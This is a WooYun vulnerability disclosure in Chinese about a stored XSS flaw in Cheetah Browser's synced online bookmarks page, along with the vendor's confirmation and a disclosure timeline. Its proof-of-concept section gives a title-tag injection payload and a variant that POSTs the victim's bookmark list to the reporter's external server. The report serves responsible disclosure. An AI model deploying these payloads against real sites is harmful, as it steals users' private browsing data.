当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107690

漏洞标题:猎豹浏览器某处设计存在问题导致可以读取用户收藏夹

相关厂商:金山软件集团

漏洞作者: 梧桐雨

提交时间:2015-04-13 21:32

修复时间:2015-07-13 00:44

公开时间:2015-07-13 00:44

漏洞类型:远程代码执行

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-13: 细节已通知厂商并且等待厂商处理中
2015-04-14: 厂商已经确认,细节仅向厂商公开
2015-04-17: 细节向第三方安全合作伙伴开放
2015-06-08: 细节向核心白帽子及相关领域专家公开
2015-06-18: 细节向普通白帽子公开
2015-06-28: 细节向实习白帽子公开
2015-07-13: 细节向公众公开

简要描述:

新上线的一个功能,测试了一下,找到了一个问题。

详细说明:

1234.jpg


最新版的。
我们来看看问题在哪儿。
问题出现在 http://i.liebao.cn/ 中的在线收藏夹。对title部分没有进行html代码转义,貌似还有一处也存在这样的问题,你们再看看。因为是同个页面我就不说了。
用户先访问我如下构造好的代码(使用猎豹安全浏览器)
http://wutongyu.info/xsstest.htm
然后收藏以后,title部分被我污染,当下一次用户通过云同步将收藏夹同步过去的话:

321.jpg


访问:http://i.liebao.cn/bookmark/
或者直接在个人中心点击在线收藏夹,收藏的地址将会被我获取:

alert.jpg


代码注入的位置:

sql.jpg

漏洞证明:

poc 代码如下:

<title>"></script></textare></span></div>
<script>
bookmark = document.getElementsByTagName("ul")[2].innerHTML;
alert(bookmark);
</script>
</title>


如果要远程获取直接写一个post请求即可:

<script>
bookmark = document.getElementsByTagName("ul")[2].innerHTML;
alert(bookmark);
bookmark = encodeURI(bookmark);
var x = new XMLHttpRequest(); 
x.open('POST', 'http://wutongyu.info/liebao.php', true); 
x.send('bookmark='+bookmark);</script>
</title>

修复方案:

过滤输出。

版权声明:转载请注明来源 梧桐雨@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2015-04-14 00:44

厂商回复:

我们尽快处理,谢谢!

最新状态:

暂无